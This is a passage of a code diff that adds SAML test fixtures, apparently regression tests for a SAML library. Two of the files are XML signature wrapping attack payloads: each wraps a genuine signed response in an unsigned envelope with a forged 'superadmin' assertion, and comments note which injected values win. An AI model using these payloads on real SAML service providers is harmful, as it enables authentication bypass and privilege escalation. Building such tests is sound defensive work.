Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>YgLTtFKmQhg5sI6ri4RCWW4bNl8=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>BWA+UYpDNnJ6kqNFEHEFiAgumplPQxzdjuEKbnZldkNE2tCvQdZ46dil0G0375dRKtRTZKLV3aL/JyhJ7hJ835IldfJ2AhDfpI+jr+KjF06amx1o6lOy0qBo0U/HzCRaG8c/ZS1BUW2eMJrBFg0QvKN5uzwst8epIa3QRaBXt5o=</ds:SignatureValue><ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICRzCCAbCgAwIBAgIIFH/2Xc6W0VYwDQYJKoZIhvcNAQEFBQAwZjEQMA4GA1UEBhMHVW5rbm93
+bjEQMA4GA1UEBxMHVW5rbm93bjEXMBUGCgmSJomT8ixkARkWB1Vua25vd24xEjAQBgNVBAsTCXBl
+blRlc3RlcjETMBEGA1UEAxMKd3NhdHRhY2tlcjAeFw0xMzA4MTcxMDAwMjZaFw0xNDA4MTcxMDAw
+MjZaMGYxEDAOBgNVBAYTB1Vua25vd24xEDAOBgNVBAcTB1Vua25vd24xFzAVBgoJkiaJk/IsZAEZ
+FgdVbmtub3duMRIwEAYDVQQLEwlwZW5UZXN0ZXIxEzARBgNVBAMTCndzYXR0YWNrZXIwgZ8wDQYJ
+KoZIhvcNAQEBBQADgY0AMIGJAoGBAIvdbrUPV/hHq0if17Ut1UyJHYvkfsKD7WU/QshqEc3Iefti
+2jsOG6hecBGZzwEfk0V2OFIO/xkmnvf21uTnNI6ktVypBEPCRWyAYjUguettLv9gi+6vlP0OZUC9
+b+ilu3QykIADFfgTJ9sR5x3zKVzlhFlckaYZoI+ajG/On961AgMBAAEwDQYJKoZIhvcNAQEFBQAD
+gYEAF2UzN7k3+rc5NE84FqzgeX7T/QY5ZSjiSCzDTg92a41Gmw95fF3UqGfxSBZOwRdm618PhAGV
+6lYq8ok4mbrTA7F/11lyFwmMSjRizjtznQmtVVXPZVfutNv8oaIRr2cyGf9pxCfpCG0jyXvusX22
+q9PkfQW/qHgIaBovmMd2Jak=</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml2:Subject><saml2:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">bob.trust@gmx.de</saml2:NameID><saml2:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml2:SubjectConfirmationData NotOnOrAfter="2014-02-01T13:51:10.831Z"/></saml2:SubjectConfirmation></saml2:Subject><saml2:Conditions NotBefore="2014-02-01T13:45:10.831Z" NotOnOrAfter="2014-02-01T13:51:10.831Z"><saml2:AudienceRestriction><saml2:Audience/></saml2:AudienceRestriction></saml2:Conditions><saml2:AuthnStatement AuthnInstant="2014-02-01T13:48:10.831Z" SessionIndex="_f918ae80-4092-0131-57de-782bcb56fcaa" SessionNotOnOrAfter="2014-02-01T14:48:10.831Z"><saml2:AuthnContext><saml2:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef></saml2:AuthnContext></saml2:AuthnStatement></saml2:Assertion></saml2p:Response>

data/spec/fixtures/xml_signature_wrapping_attack_response_attributes.xml ADDED Viewed

@@ -0,0 +1,45 @@
+<!-- = = = = = = = = = = = = = = -->
+<!-- unsigned malicious envelope -->
+<!-- = = = = = = = = = = = = = = -->
+<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="attackergenerated1" Version="2.0" IssueInstant="2012-08-03T20:07:15Z" Destination="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer>
+  <samlp:Status>
+    <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
+    <samlp:StatusDetail>
+<!-- = = = = = = = = = = = -->
+<!-- valid signed response -->
+<!-- = = = = = = = = = = = -->
+<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_32f10e8e465fcef72368e220faeb81db4c72f0c687" Version="2.0" IssueInstant="2012-08-03T20:07:15Z" Destination="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+  <ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+    <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+  <ds:Reference URI="#_32f10e8e465fcef72368e220faeb81db4c72f0c687"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>S6Ne11nB7g1OyQAGYrFEOnu5QAQ=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>mgqZUiA3matrj6Zy4Dl+1ghsgoOl8wPH2mrFM9PAqrYB0skuJUZhYUkCegEbEX9WROEhoZ2bgwJQqeUPyX7leMPe7SSdUDNKf9kiuvpcCYZs1lFSEd51Ec8f+HvejmHUJAU+JIRWpp1VkYUZATihwjGLok3NGi/ygoajNh42vZ4=</ds:SignatureValue>
+<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_6212b7e8c069d0f948c8648991d357addc4095a82f" Version="2.0" IssueInstant="2012-08-03T20:07:15Z"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+  <ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+    <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+  <ds:Reference URI="#_6212b7e8c069d0f948c8648991d357addc4095a82f"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>kaZN1+moS328pr2zn8SKUML1ElI=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>1kUEkG33ZGQMf/1H1gzqBOhT5N2I35vM04Jp67xVjnZXF54AqPq1ZaM+Wjgx++AjEbL7ksaYuM3JSyK7GlZ77VmzpLsMqn4eM00K7Y+CeZy5LB24vcngXPxBk6BdUYkVk0vOsUfAAZ+mRX/zzBW7Z4C7qbjNGhAAJgi13JoBWpU=</ds:SignatureValue>
+<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID SPNameQualifier="http://shard1.localdomain/saml2" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">_3b3e7714b72e29dc4290321a075fa0b73333a4f25f</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2012-08-03T20:12:15Z" Recipient="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2012-08-03T20:06:45Z" NotOnOrAfter="2012-08-03T20:12:15Z"><saml:AudienceRestriction><saml:Audience>http://shard1.localdomain/saml2</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2012-08-03T20:07:15Z" SessionNotOnOrAfter="2012-08-04T04:07:15Z" SessionIndex="_02f26af30a37afb92081f3a73728810193efd7fa6e"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement><saml:AttributeStatement><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">member</saml:AttributeValue></saml:Attribute><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">student@example.edu</saml:AttributeValue></saml:Attribute></saml:AttributeStatement></saml:Assertion></samlp:Response>
+    </samlp:StatusDetail>
+  </samlp:Status>
+  <saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="attackergenerated2" Version="2.0" IssueInstant="2012-08-03T20:07:15Z">
+    <saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer>
+    <saml:AuthnStatement AuthnInstant="2012-08-03T20:07:15Z" SessionNotOnOrAfter="2012-08-04T04:07:15Z" SessionIndex="_02f26af30a37afb92081f3a73728810193efd7fa6e">
+      <saml:AuthnContext>
+        <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
+      </saml:AuthnContext>
+    </saml:AuthnStatement>
+    <saml:Subject>
+      <saml:NameID SPNameQualifier="http://shard1.localdomain/saml2" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">superadmin</saml:NameID>
+    </saml:Subject>
+    <!-- = = = = = = = = = = = = = = = -->
+    <!-- last attributes will win      -->
+    <!-- = = = = = = = = = = = = = = = -->
+    <saml:AttributeStatement>
+      <saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+        <saml:AttributeValue xsi:type="xs:string">superadmin</saml:AttributeValue></saml:Attribute>
+      <saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+        <saml:AttributeValue xsi:type="xs:string">superadmin@example.edu</saml:AttributeValue>
+      </saml:Attribute>
+    </saml:AttributeStatement>
+  </saml:Assertion>
+</samlp:Response>

data/spec/fixtures/xml_signature_wrapping_attack_response_nameid.xml ADDED Viewed

@@ -0,0 +1,44 @@
+<!-- = = = = = = = = = = = = = = -->
+<!-- unsigned malicious envelope -->
+<!-- = = = = = = = = = = = = = = -->
+<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="attackergenerated1" Version="2.0" IssueInstant="2012-08-03T20:07:15Z" Destination="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer>
+  <saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="attackergenerated2" Version="2.0" IssueInstant="2012-08-03T20:07:15Z">
+    <saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer>
+    <saml:AuthnStatement AuthnInstant="2012-08-03T20:07:15Z" SessionNotOnOrAfter="2012-08-04T04:07:15Z" SessionIndex="_02f26af30a37afb92081f3a73728810193efd7fa6e">
+      <saml:AuthnContext>
+        <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
+      </saml:AuthnContext>
+    </saml:AuthnStatement>
+    <!-- = = = = = = = = = = = = = = = -->
+    <!-- first nameid will win         -->
+    <!-- = = = = = = = = = = = = = = = -->
+    <saml:Subject>
+      <saml:NameID SPNameQualifier="http://shard1.localdomain/saml2" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">superadmin</saml:NameID>
+    </saml:Subject>
+    <saml:AttributeStatement>
+      <saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+        <saml:AttributeValue xsi:type="xs:string">superadmin</saml:AttributeValue></saml:Attribute>
+      <saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+        <saml:AttributeValue xsi:type="xs:string">superadmin@example.edu</saml:AttributeValue>
+      </saml:Attribute>
+    </saml:AttributeStatement>
+  </saml:Assertion>
+  <samlp:Status>
+    <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
+    <samlp:StatusDetail>
+<!-- = = = = = = = = = = = -->
+<!-- valid signed response -->
+<!-- = = = = = = = = = = = -->
+<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_32f10e8e465fcef72368e220faeb81db4c72f0c687" Version="2.0" IssueInstant="2012-08-03T20:07:15Z" Destination="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+  <ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+    <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+  <ds:Reference URI="#_32f10e8e465fcef72368e220faeb81db4c72f0c687"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>S6Ne11nB7g1OyQAGYrFEOnu5QAQ=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>mgqZUiA3matrj6Zy4Dl+1ghsgoOl8wPH2mrFM9PAqrYB0skuJUZhYUkCegEbEX9WROEhoZ2bgwJQqeUPyX7leMPe7SSdUDNKf9kiuvpcCYZs1lFSEd51Ec8f+HvejmHUJAU+JIRWpp1VkYUZATihwjGLok3NGi/ygoajNh42vZ4=</ds:SignatureValue>
+<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_6212b7e8c069d0f948c8648991d357addc4095a82f" Version="2.0" IssueInstant="2012-08-03T20:07:15Z"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+  <ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+    <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+  <ds:Reference URI="#_6212b7e8c069d0f948c8648991d357addc4095a82f"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>kaZN1+moS328pr2zn8SKUML1ElI=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>1kUEkG33ZGQMf/1H1gzqBOhT5N2I35vM04Jp67xVjnZXF54AqPq1ZaM+Wjgx++AjEbL7ksaYuM3JSyK7GlZ77VmzpLsMqn4eM00K7Y+CeZy5LB24vcngXPxBk6BdUYkVk0vOsUfAAZ+mRX/zzBW7Z4C7qbjNGhAAJgi13JoBWpU=</ds:SignatureValue>
+<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID SPNameQualifier="http://shard1.localdomain/saml2" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">_3b3e7714b72e29dc4290321a075fa0b73333a4f25f</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2012-08-03T20:12:15Z" Recipient="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2012-08-03T20:06:45Z" NotOnOrAfter="2012-08-03T20:12:15Z"><saml:AudienceRestriction><saml:Audience>http://shard1.localdomain/saml2</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2012-08-03T20:07:15Z" SessionNotOnOrAfter="2012-08-04T04:07:15Z" SessionIndex="_02f26af30a37afb92081f3a73728810193efd7fa6e"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement><saml:AttributeStatement><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">member</saml:AttributeValue></saml:Attribute><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">student@example.edu</saml:AttributeValue></saml:Attribute></saml:AttributeStatement></saml:Assertion></samlp:Response>
+    </samlp:StatusDetail>
+  </samlp:Status>
+</samlp:Response>